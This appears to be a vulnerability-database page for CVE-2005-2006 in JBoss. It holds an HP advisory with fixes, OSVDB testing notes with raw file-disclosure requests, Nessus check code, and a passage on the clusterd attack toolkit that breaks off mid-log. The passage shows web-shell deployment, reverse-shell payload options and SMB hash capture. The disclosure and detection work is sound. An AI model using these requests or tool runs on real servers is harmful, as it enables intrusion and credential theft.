ID CVE-2005-2006 Type cve Reporter cve@mitre.org Modified 2018-10-19T15:32:00
Description
JBOSS 3.2.2 through 3.2.7 and 4.0.2 allows remote attackers to obtain sensitive information via a GET request (1) with a "%." (percent dot), which reveals the installation path or (2) with a % (percent) before a filename, which reveals the contents of the file.
{"dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "description": "File Disclosure Vulnerability\n\nVulnerability Type: File Disclosure", "modified": "2013-04-02T00:00:00", "published": "2012-03-18T00:00:00", "id": "E-195", "href": "", "type": "dsquare", "title": "RedHat JBoss File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:15", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c00597967\r\nVersion: 2\r\n\r\nHPSBMA02096 SSRT061108 rev.2 - HP Systems Insight Manager Remote\r\nUnauthorized Access - Directory Traversal\r\n\r\nNOTICE: The information in this Security Bulletin should be acted\r\nupon as soon as possible.\r\n\r\nRelease Date: 2006-02-06\r\nLast Updated: 2006-02-07\r\n\r\nPotential Security Impact: Remote unauthorized access via\r\ndirectory traversal\r\n\r\nSource: Hewlett-Packard Company,\r\n HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP\r\nSystems Insight Manager (SIM) versions 4.0 and 5.0 running on\r\nMicrosoft Windows. The potential vulnerabilities could be\r\nexploited to allow remote unauthorized access to files via\r\ndirectory traversal.\r\n\r\nReferences: CVE-2005-2006\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP SIM 4.2, HP SIM 4.2 SP1, HP SIM 4.2 SP2,\r\nHP SIM 5.0, HP SIM 5.0 SP1, HP SIM 5.0 SP2, HP SIM 5.0 SP3\r\nrunning on Microsoft Windows 2000, Windows 2003, Windows XP.\r\n\r\nBACKGROUND\r\n\r\nThe Hewlett-Packard Company thanks\r\nMatthew Cook (http://escarpment.net/), Loughborough University and\r\nPaul Whitton (http://splurby.net/), Loughborough University\r\nfor reporting this vulnerability to security-alert@hp.com.\r\n\r\nTwo potential directory traversal vulnerabilities have been\r\nidentified within HP Systems Insight Manager.\r\n\r\nThe first is a potential vulnerability associated with the use of\r\nJBOSS 3.2.7 which could allow an unauthorized user access to files\r\non the local file system. This issue is identified by the\r\nfollowing candidate for Common Vulnerabilities and Exposures(CVE):\r\n\r\nCVE-2005-2006 - JBOSS 3.2.2 through 3.2.7 and 4.0.2 allows remote\r\nattackers to obtain sensitive information via a GET request.\r\n\r\nThe following URL at the Common Vulnerabilities and Exposures(CVE)\r\nwebsite can be used to find more detailed information regarding\r\nthe above listed CVE numbers: http://www.cve.mitre.org/\r\n\r\nThe affected versions for the first potential vulnerability\r\nrelated to CVE-2005-2006 are:\r\n\r\nHP SIM 5.0\r\nHP SIM 5.0 SP1\r\nHP SIM 5.0 SP2\r\nHP SIM 5.0 SP3\r\nOnly for Microsoft Windows 2000, Windows 2003, Windows XP.\r\n\r\nThe affected versions for the second potential vulnerability are:\r\n\r\nHP SIM 4.2\r\nHP SIM 4.2 SP1\r\nHP SIM 4.2 SP2\r\nHP SIM 5.0\r\nHP SIM 5.0 SP1\r\nHP SIM 5.0 SP2\r\nHP SIM 5.0 SP3\r\nOnly for Microsoft Windows 2000, Windows 2003, Windows XP.\r\n\r\n\r\nRESOLUTION\r\n\r\nThese issues can be addressed by manually editing configuration\r\nfiles in the HP SIM installation as described below.\r\n\r\nFirst Issue (CVE-2005-2006):\r\n\r\nThis requires a single line modification to an XML configuration\r\nfile. The affected file is located in the\r\n <installdir>/jboss/server/hpsim/conf\r\ndirectory and is called jboss-service.xml\r\n\r\nNote: <installdir> is the base directory where HP SIM is\r\ninstalled. A typical default installation would be\r\n"C:\program files\hp\Systems Insight Manager"\u201d.\r\n\r\nFirst the file should be copied to a backup location. If there are\r\nproblems in the editing process the original file can be restored.\r\n\r\nNext edit the jboss-service.xml file and search for 50013. The\r\nfollowing text will be seen:\r\n\r\n<mbean code="org.jboss.web.WebService"\r\n name="jboss:service=WebService">\r\n <attribute name="Port">50013</attribute>\r\n <!-- Should resources and non-EJB classes be downloadable -->\r\n <attribute name="DownloadServerClasses">true</attribute>\r\n <attribute name="Host">${jboss.bind.address}</attribute>\r\n <attribute name="BindAddress">${jboss.bind.address}</attribute>\r\n</mbean>\r\n\r\nChange the following line:\r\n\r\n<attribute name="DownloadServerClasses">true</attribute>\r\n\r\nTo:\r\n\r\n<attribute name="DownloadServerClasses">false</attribute>\r\n\r\n\r\nAfter editing the text should look like this:\r\n\r\n<mbean code="org.jboss.web.WebService"\r\n name="jboss:service=WebService">\r\n <attribute name="Port">50013</attribute>\r\n <!-- Should resources and non-EJB classes be downloadable -->\r\n <attribute name="DownloadServerClasses">false</attribute>\r\n <attribute name="Host">${jboss.bind.address}</attribute>\r\n <attribute name="BindAddress">${jboss.bind.address}</attribute>\r\n</mbean>\r\n\r\nSave the file. After applying the change for the second issue\r\n(below) restart HP SIM.\r\n\r\nSecond Issue:\r\n\r\nThis requires a single line modification to a resource file. The\r\naffected file is located in the\r\n <installdir>\hpwebadmin\webapps\mxhelp\WEB-INF\cgi\r\ndirectory and is called .namazurc\r\n\r\nNote: <installdir> is the base directory where HP SIM is\r\ninstalled. A typical default installation would be\r\n"C:\program files\hp\Systems Insight Managerr".\r\n\r\nFirst the file should be copied to a backup location. If there are\r\nproblems in the editing process the original file can be restored.\r\n\r\nNext edit the .namazurc file and search for #Lang. The following\r\ntext will be seen:\r\n\r\n #Lang ja\r\n\r\nIf the HP SIM installation is an English language installation\r\nchange the line to:\r\n\r\n Lang en\r\n\r\nIf the HP SIM installation is a Japanese language installation\r\nchange the line to:\r\n\r\n Lang ja_JP.SJIS\r\n\r\nNote: Make sure to remove the # at the beginning of the line.\r\n\r\nSave the file and restart HP SIM.\r\n\r\nThis Security Bulletin will be revised if other solutions become\r\navailable.\r\n\r\n\r\nHISTORY\r\nVersion:1(rev.1) 6 February 2006 Initial release\r\nVersion:2(rev.2) 7 February 2006 add HP SIM 4.2 SP2\r\n\r\n\r\n\r\nSupport: For further information, contact normal HP Services\r\nsupport channel.\r\n\r\nReport: To report a potential security vulnerability with any HP\r\nsupported product, send Email to: security-alert@hp.com. It is\r\nstrongly recommended that security related information being\r\ncommunicated to HP be encrypted using PGP, especially exploit\r\ninformation. To get the security-alert PGP key, please send an\r\ne-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\n\r\nSubscribe: To initiate a subscription to receive future HP\r\nSecurity Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&\r\nlangcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\n\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n - check ALL categories for which alerts are required and\r\n continue.\r\nUnder Step2: your ITRC operating systems\r\n - verify your operating system selections are checked and\r\n save.\r\n\r\nTo update an existing subscription:\r\nhttp://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page:\r\n Subscriber's choice for Business: sign-in.\r\nOn the web page:\r\n Subscriber's Choice: your profile summary\r\n - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters of the\r\nBulletin number in the title:\r\n\r\n GN = HP General SW,\r\n MA = HP Management Agents,\r\n MI = Misc. 3rd party SW,\r\n MP = HP MPE/iX,\r\n NS = HP NonStop Servers,\r\n OV = HP OpenVMS,\r\n PI = HP Printing & Imaging,\r\n ST = HP Storage SW,\r\n TL = HP Trusted Linux,\r\n TU = HP Tru64 UNIX,\r\n UX = HP-UX,\r\n VV = HP Virtual Vault\r\n\r\n\r\nSystem management and security procedures must be reviewed\r\nfrequently to maintain system integrity. HP is continually\r\nreviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to\r\nbring to the attention of users of the affected HP products the\r\nimportant security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this\r\ninformation to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily\r\naccurate or complete for all user situations and, consequently, HP\r\nwill not be responsible for any damages resulting from user's use\r\nor disregard of the information provided in this Bulletin. To the\r\nextent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability\r\nand fitness for a particular purpose, title and non-infringement."\r\n\r\n\r\n(c)Copyright 2006 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or\r\neditorial errors or omissions contained herein. The information\r\nprovided is provided "as is" without warranty of any kind. To the\r\nextent permitted by law, neither HP nor its affiliates,\r\nsubcontractors or suppliers will be liable for incidental, special\r\nor consequential damages including downtime cost; lost profits;\r\ndamages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration.\r\nThe information in this document is subject to change without\r\nnotice. Hewlett-Packard Company and the names of Hewlett-Packard\r\nproducts referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product\r\nand company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBQ+s/yeAfOvwtKn1ZEQLnUQCg1GXSuTaKquJUCzD4G7C6qLMHJXcAn1aq\r\ndNuWNJuckfW2077VdALs4btJ\r\n=3BS1\r\n-----END PGP SIGNATURE-----", "modified": "2006-02-13T00:00:00", "published": "2006-02-13T00:00:00", "id": "SECURITYVULNS:DOC:11400", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11400", "title": "[security bulletin] SSRT061108 rev.2 - HP Systems Insight Manager Remote Unauthorized Access - Directory Traversal", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "## Manual Testing Notes\n$ telnet [victim] 8083\nGET %. HTTP/1.0\n## References:\nVendor URL: http://www.illegalaccess.org/java/jboss_path.php\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2005_26_sr.html)\n[Vendor Specific Advisory URL](http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00597967)\n[Vendor Specific Advisory URL](http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml)\nSecurity Tracker: 1014234\n[Secunia Advisory ID:21118](https://secuniaresearch.flexerasoftware.com/advisories/21118/)\n[Secunia Advisory ID:18789](https://secuniaresearch.flexerasoftware.com/advisories/18789/)\n[Secunia Advisory ID:15746](https://secuniaresearch.flexerasoftware.com/advisories/15746/)\n[Secunia Advisory ID:17559](https://secuniaresearch.flexerasoftware.com/advisories/17559/)\n[Related OSVDB ID: 17403](https://vulners.com/osvdb/OSVDB:17403)\n[Related OSVDB ID: 17404](https://vulners.com/osvdb/OSVDB:17404)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-07/0044.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0144.html\n[CVE-2005-2006](https://vulners.com/cve/CVE-2005-2006)\n", "modified": "2005-06-17T06:45:09", "published": "2005-06-17T06:45:09", "href": "https://vulners.com/osvdb/OSVDB:17402", "id": "OSVDB:17402", "title": "JBoss org.jboss.web.WebServer Class Crafted Request Path Disclosure", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "## Manual Testing Notes\n$ telnet [victim] 8083\nGET %server.policy HTTP/1.0\n\n$ telnet [victim] 8083\nGET %login-config.xml\n## References:\nVendor URL: http://www.illegalaccess.org/java/jboss_path.php\n[Vendor Specific Advisory URL](http://www.novell.com/linux/security/advisories/2005_26_sr.html)\n[Vendor Specific Advisory URL](http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00597967)\n[Vendor Specific Advisory URL](http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml)\nSecurity Tracker: 1014234\n[Secunia Advisory ID:21118](https://secuniaresearch.flexerasoftware.com/advisories/21118/)\n[Secunia Advisory ID:18789](https://secuniaresearch.flexerasoftware.com/advisories/18789/)\n[Secunia Advisory ID:15746](https://secuniaresearch.flexerasoftware.com/advisories/15746/)\n[Secunia Advisory ID:17559](https://secuniaresearch.flexerasoftware.com/advisories/17559/)\n[Related OSVDB ID: 17402](https://vulners.com/osvdb/OSVDB:17402)\n[Related OSVDB ID: 17404](https://vulners.com/osvdb/OSVDB:17404)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-07/0044.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0144.html\n[CVE-2005-2006](https://vulners.com/cve/CVE-2005-2006)\n", "modified": "2005-06-17T06:45:09", "published": "2005-06-17T06:45:09", "href": "https://vulners.com/osvdb/OSVDB:17403", "id": "OSVDB:17403", "title": "JBoss org.jboss.web.WebServer Class % File Request Source Disclosure", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2019-12-13T07:51:45", "bulletinFamily": "scanner", "description": "The remote JBoss server is vulnerable to an information disclosure\nflaw that could allow an attacker to retrieve the physical path of the\nserver installation, its security policy, or to guess its exact\nversion number. An attacker may use this flaw to gain more\ninformation about the remote configuration.", "modified": "2019-12-02T00:00:00", "id": "JBOSS_CONFIG_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/18526", "published": "2005-06-18T00:00:00", "title": "JBoss org.jboss.web.WebServer Class Multiple Vulnerabilities (Source Disc, ID)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n# \n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(18526);\n\n script_cve_id(\"CVE-2005-2006\", \"CVE-2006-0656\");\n script_bugtraq_id(13985, 16571);\n\n script_version(\"1.21\");\n \n script_name(english:\"JBoss org.jboss.web.WebServer Class Multiple Vulnerabilities (Source Disc, ID)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by an information disclosure flaw.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote JBoss server is vulnerable to an information disclosure\nflaw that could allow an attacker to retrieve the physical path of the\nserver installation, its security policy, or to guess its exact\nversion number. An attacker may use this flaw to gain more\ninformation about the remote configuration.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=bugtraq&m=111911095424496&w=2\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/advisories/10104\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to JBoss 3.2.8 or 4.0.3. Or edit JBoss' 'jboss-service.xml'\nconfiguration file, set 'DownloadServerClasses' to 'false', and\nrestart the server.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"RedHat JBoss File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/06/18\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/06/17\");\n script_cvs_date(\"Date: 2018/11/15 20:50:17\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:jboss:jboss\");\nscript_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Attempts to read security policy of a remote JBoss server\";\n \n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english: \"CGI abuses\");\n script_dependencie(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8083, 50013);\n exit(0);\n}\n\n# Check starts here\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nports = get_kb_list(\"Services/www\");\nports = add_port_in_list(list:ports, port:8083);\nports = add_port_in_list(list:ports, port:50013);\n\nforeach port (ports) {\n if (get_port_state(port)) {\n r = http_send_recv3(port:port, method: 'GET', item: \"%.\");\n\n if (! isnull(r) && ereg(pattern:\"^HTTP/.* 400 (/|[A-Za-z]:\\\\)\", string:r[0])) {\n file = \"server.policy\";\n r = http_send_recv3(method: 'GET', item:\"%\"+file, port:port);\n if (!isnull(r) && \"JBoss Security Policy\" >< r[2]) {\n report = string(\n \"Here are the contents of the file '\", file, \"' that\\n\",\n \"Nessus was able to read from the remote host :\\n\",\n \"\\n\",\n r[2]\n );\n\n security_warning(port:port, extra:report);\n }\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kitploit": [{"lastseen": "2019-10-18T10:36:24", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-v2UcR3lP-bc/WcVen5F3_HI/AAAAAAAAI70/ApFGZzXmJuUfahdN3quoSPbN9hlALh3_gCLcBGAs/s1600/clusterd.png>)\n\n \n\n\nclusterd is an open source application server attack toolkit. Born out of frustration with current fingerprinting and exploitation methods, clusterd automates the fingerprinting, reconnaissance, and exploitation phases of an application server attack. See the wiki for more information. \n\n \n** Requirements ** \n\n\n * Python >= 2.7.x \n * Requests >= 2.2.x \n \n** Installation ** \nThe recommended installation of clusterd is to clone the Github repository \n\n \n \n git clone https://github.com/hatRiot/clusterd.git\n\n \n** clusterd features ** \n\n\n * clusterd currently supports six different application server platforms, with several more currently in development and research phases \n\n * JBoss \n\n * Versions 3.x - 8.1 \n * Currently supported deployers: \n * /jmx-console/MainDeployer for 3.x, 4.x, and 6.x \n * /jmx-console/DeploymentFileRepository for 3.x, 4.x, and 5.x \n * /web-console/Invoker (MainDeployer) for 3.x, 4.x, and 6.x \n * /web-console/Invoker (BSHDeployer) for 3.x and 4.x \n * /invoker/JMXInvokerServlet for 3.x, 4.x, and 5.x \n * /invoker/EJBInvokerServlet for 3.x, 4.x, and 5.x \n * /management for 7.x, 8.x \n * SEAM2 for 5.1, 6.x \n * Dump deployed WARs \n * Fetch host OS information \n * Verb tampering vulnerability (CVE-2010-0738) \n * Credential/path disclosure (CVE-2005-2006) \n * ColdFusion \n\n * Versions 5 - 11 \n * Currently supported deployers: \n * Task Scheduler for 5.x, 6.x, 7.x, 8.x, 9.x, 10.x, and 11.x \n * FCKeditor for 8.x \n * LFI Log Injection 6.x, 7.x, and 8.x \n * Hash retrieval for versions 6 - 10 \n * RDS admin bypass (CVE-2013-0632) \n * Pass the hash authentication for versions 7 - 9 \n * WebLogic \n\n * Versions 7, 8.1, 11, and 12 \n * Deployer over T3 and T3S currently tested against 11.x and 12.x \n * Dump deployed WARs over T3/T3S \n * Fetch host OS information \n * Tomcat \n\n * Versions 3.x - 8.x \n * Currently can deploy to all versions with an exposed manager interface \n * Dump deployed WARs \n * Fetch host OS information \n * Railo \n\n * Versions 3.x - 4.x \n * Currently supported deployers: \n * Task scheduler for 3.x and 4.x \n * Log injection for 3.x and 4.x \n * Thumbnail pre-auth RCE for 3.x and 4.x (up to 4.2.1) \n * Fetch host OS information \n * Pre-auth Password retrieval for 3.x - 4.2.1 \n * Axis2 \n\n * Versions 1.4 - 1.6 \n * Currently supported deployers: \n * Admin interface for 1.4, 1.5, and 1.6 \n * Fetch host OS information \n * View deployed services \n * Credential disclosure for 1.4 \n * Glassfish \n\n * Versions 3.x - 4.x \n * View deployed services \n * Currently supported deployers: \n * Admin upload for 3.x and 4.x \n * Simple API for adding new platforms, fingerprints, deployers, and exploits \n\n * Various auxiliary modules for [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) and exploitation techniques \n\n \n** examples / usage ** \n\n \n \n $ ./clusterd.py \n \n clusterd/0.3.1 - clustered attack toolkit\n [Supporting 7 platforms]\n \n usage: ./clusterd.py [options]\n \n optional arguments:\n -h, --help show this help message and exit\n \n Connection:\n Options for configuring the connection\n \n -i [ip address] Server address\n -iL [file] Server list\n -p [port] Server port\n --proxy [proxy://server:port]\n Connect through proxy [http|https]\n --proxy-auth [username:password]\n Proxy credentials\n --timeout [seconds] Connection timeout [5s]\n --random-agent Use a random User-Agent for requests\n --ssl Force SSL\n \n Remote Host:\n Settings specific to the remote host\n \n -a [jboss|coldfusion|weblogic|tomcat|railo|axis2|glassfish]\n Hint at remote host service\n -o [windows|linux] Hint at remote host OS\n -v [version] Specific version to test\n --usr-auth [username:password]\n Login credentials for service\n --fingerprint Fingerprint the remote system\n --arch [x86|x64] Specify remote OS architecture\n \n Deploy:\n Deployment flags and settings\n \n --deploy [file] Deploy to the discovered service\n --undeploy [context] Undeploy file from server\n --deployer [deployer]\n Specify a deployer to use\n --invoke Invoke payload after deployment\n --rand-payload Use a random name for the deployed file\n -b [user] Brute force credentials for user [admin]\n --wordlist [path] Wordlist for brute forcing passwords\n \n Other:\n Miscellaneous flags\n \n --deployer-list List all available deployers\n --aux-list [platform]\n List all available exploits\n --gen-payload [host:port] for reverse connection\n Generate a reverse shell payload\n --discover [discovery_file]\n Attempt to discover application servers using the\n specified nmap gnmap output (use -sV when scanning)\n --listen [adapter] Adapter to listen on when needed\n -d Enable debug output\n -l Log output to file [$time$_log.log]\n\njboss fingerprint and host info \n\n \n \n $ ./clusterd.py -i 192.168.1.105 -a jboss --jb-info --random-agent\n \n clusterd/0.3 - clustered attack toolkit\n [Supporting 6 platforms]\n \n [2014-05-25 10:57PM] Started at 2014-05-25 10:57PM\n [2014-05-25 10:57PM] Servers' OS hinted at windows\n [2014-05-25 10:57PM] Fingerprinting host '192.168.1.105'\n [2014-05-25 10:57PM] Server hinted at 'jboss'\n [2014-05-25 10:57PM] Checking jboss version 3.2 JBoss JMX Console...\n [2014-05-25 10:57PM] Checking jboss version 3.2 JBoss Web Console...\n [2014-05-25 10:57PM] Checking jboss version 3.0 JBoss JMX Console...\n [2014-05-25 10:57PM] Checking jboss version 4.2 JBoss JMX Console...\n [2014-05-25 10:57PM] Checking jboss version 4.2 JBoss Web Console...\n [2014-05-25 10:57PM] Checking jboss version 4.0 JBoss JMX Console...\n [2014-05-25 10:57PM] Checking jboss version 4.0 JBoss Web Console...\n [2014-05-25 10:57PM] Checking jboss version 5.1 JBoss Web Manager...\n [2014-05-25 10:57PM] Checking jboss version 5.1 JBoss JMX Console...\n [2014-05-25 10:57PM] Checking jboss version 5.1 JBoss Web Console...\n [2014-05-25 10:57PM] Checking jboss version 5.0 JBoss JMX Console...\n [2014-05-25 10:57PM] Checking jboss version 5.0 JBoss Web Console...\n [2014-05-25 10:57PM] Checking jboss version 6.0 JBoss Web Manager...\n [2014-05-25 10:57PM] Checking jboss version 6.1 JBoss Web Manager...\n [2014-05-25 10:57PM] Checking jboss version 6.1 JBoss JMX Console...\n [2014-05-25 10:57PM] Checking jboss version 6.0 JBoss JMX Console...\n [2014-05-25 10:57PM] Checking jboss version 7.1 JBoss Management...\n [2014-05-25 10:57PM] Checking jboss version 7.0 JBoss Management...\n [2014-05-25 10:57PM] Checking jboss version 8.0 JBoss Management...\n [2014-05-25 10:57PM] Checking jboss version Any JBoss EJB Invoker Servlet...\n [2014-05-25 10:57PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...\n [2014-05-25 10:57PM] Checking jboss version Any JBoss JMX Invoker Servlet...\n [2014-05-25 10:57PM] Checking jboss version Any JBoss RMI Interface...\n [2014-05-25 10:57PM] Checking jboss version Any JBoss Status Page...\n [2014-05-25 10:57PM] Matched 7 fingerprints for service jboss\n [2014-05-25 10:57PM] JBoss JMX Console (version 5.0)\n [2014-05-25 10:57PM] JBoss Web Console (version 5.0)\n [2014-05-25 10:57PM] JBoss EJB Invoker Servlet (version Any)\n [2014-05-25 10:57PM] JBoss HTTP Headers (Unreliable) (version 5.0)\n [2014-05-25 10:57PM] JBoss JMX Invoker Servlet (version Any)\n [2014-05-25 10:57PM] JBoss RMI Interface (version Any)\n [2014-05-25 10:57PM] JBoss Status Page (version Any)\n [2014-05-25 10:57PM] Fingerprinting completed.\n [2014-05-25 10:57PM] Attempting to retrieve JBoss info...\n [2014-05-25 10:57PM] ActiveThreadCount: 68 \n [2014-05-25 10:57PM] AvailableProcessors: 1 \n [2014-05-25 10:57PM] OSArch: amd64 \n [2014-05-25 10:57PM] MaxMemory: 518979584 \n [2014-05-25 10:57PM] HostAddress: 192.168.1.105 \n [2014-05-25 10:57PM] JavaVersion: 1.7.0_45 \n [2014-05-25 10:57PM] OSVersion: 6.1 \n [2014-05-25 10:57PM] TotalMemory: 286703616 \n [2014-05-25 10:57PM] JavaVendor: Oracle Corporation \n [2014-05-25 10:57PM] ActiveThreadGroupCount: 9 \n [2014-05-25 10:57PM] OSName: Windows 7 \n [2014-05-25 10:57PM] FreeMemory: 122651808 \n [2014-05-25 10:57PM] HostName: bryan-PC \n [2014-05-25 10:57PM] JavaVMVersion: 24.45-b08 \n [2014-05-25 10:57PM] JavaVMVendor: Oracle Corporation \n [2014-05-25 10:57PM] JavaVMName: Java HotSpot(TM) 64-Bit Server VM \n [2014-05-25 10:57PM] Finished at 2014-05-25 10:57PM\n\njboss DFS deployment against JBoss 5.0 \n\n \n \n $ ./clusterd.py -i 192.168.1.105 -a jboss -v5.0 --deploy ./src/lib/resources/cmd.war --random-agent\n \n clusterd/0.3 - clustered attack toolkit\n [Supporting 6 platforms]\n \n [2014-05-25 11:00PM] Started at 2014-05-25 11:00PM\n [2014-05-25 11:00PM] Servers' OS hinted at windows\n [2014-05-25 11:00PM] Fingerprinting host '192.168.1.105'\n [2014-05-25 11:00PM] Server hinted at 'jboss'\n [2014-05-25 11:00PM] Checking jboss version 5.0 JBoss JMX Console...\n [2014-05-25 11:00PM] Checking jboss version 5.0 JBoss Web Console...\n [2014-05-25 11:00PM] Checking jboss version Any JBoss EJB Invoker Servlet...\n [2014-05-25 11:00PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...\n [2014-05-25 11:00PM] Checking jboss version Any JBoss JMX Invoker Servlet...\n [2014-05-25 11:00PM] Checking jboss version Any JBoss RMI Interface...\n [2014-05-25 11:00PM] Checking jboss version Any JBoss Status Page...\n [2014-05-25 11:00PM] Matched 7 fingerprints for service jboss\n [2014-05-25 11:00PM] JBoss JMX Console (version 5.0)\n [2014-05-25 11:00PM] JBoss Web Console (version 5.0)\n [2014-05-25 11:00PM] JBoss EJB Invoker Servlet (version Any)\n [2014-05-25 11:00PM] JBoss HTTP Headers (Unreliable) (version 5.0)\n [2014-05-25 11:00PM] JBoss JMX Invoker Servlet (version Any)\n [2014-05-25 11:00PM] JBoss RMI Interface (version Any)\n [2014-05-25 11:00PM] JBoss Status Page (version Any)\n [2014-05-25 11:00PM] Fingerprinting completed.\n [2014-05-25 11:00PM] This deployer requires a JSP, default to cmd.jsp? [Y/n] > \n [2014-05-25 11:00PM] Preparing to deploy cmd...\n [2014-05-25 11:00PM] Successfully deployed '/cmd/cmd.jsp'\n [2014-05-25 11:00PM] Finished at 2014-05-25 11:00PM\n\njboss UNC hash retrieval \n\n \n \n $ sudo ./clusterd.py -i 192.168.1.105 -a jboss -v4.2 --random-agent --jb-smb\n \n clusterd/0.3 - clustered attack toolkit\n [Supporting 6 platforms]\n \n [2014-05-25 11:01PM] Started at 2014-05-25 11:01PM\n [2014-05-25 11:01PM] Servers' OS hinted at windows\n [2014-05-25 11:01PM] Fingerprinting host '192.168.1.105'\n [2014-05-25 11:01PM] Server hinted at 'jboss'\n [2014-05-25 11:01PM] Checking jboss version 4.2 JBoss JMX Console...\n [2014-05-25 11:01PM] Checking jboss version 4.2 JBoss Web Console...\n [2014-05-25 11:01PM] Checking jboss version Any JBoss EJB Invoker Servlet...\n [2014-05-25 11:01PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...\n [2014-05-25 11:01PM] Checking jboss version Any JBoss JMX Invoker Servlet...\n [2014-05-25 11:01PM] Checking jboss version Any JBoss RMI Interface...\n [2014-05-25 11:01PM] Checking jboss version Any JBoss Status Page...\n [2014-05-25 11:01PM] Matched 7 fingerprints for service jboss\n [2014-05-25 11:01PM] JBoss JMX Console (version 4.2)\n [2014-05-25 11:01PM] JBoss Web Console (version 4.2)\n [2014-05-25 11:01PM] JBoss EJB Invoker Servlet (version Any)\n [2014-05-25 11:01PM] JBoss HTTP Headers (Unreliable) (version 4.2)\n [2014-05-25 11:01PM] JBoss JMX Invoker Servlet (version Any)\n [2014-05-25 11:01PM] JBoss RMI Interface (version Any)\n [2014-05-25 11:01PM] JBoss Status Page (version Any)\n [2014-05-25 11:01PM] Fingerprinting completed.\n [2014-05-25 11:01PM] Setting up SMB listener..\n [2014-05-25 11:01PM] Invoking UNC loader...\n [2014-05-25 11:01PM] 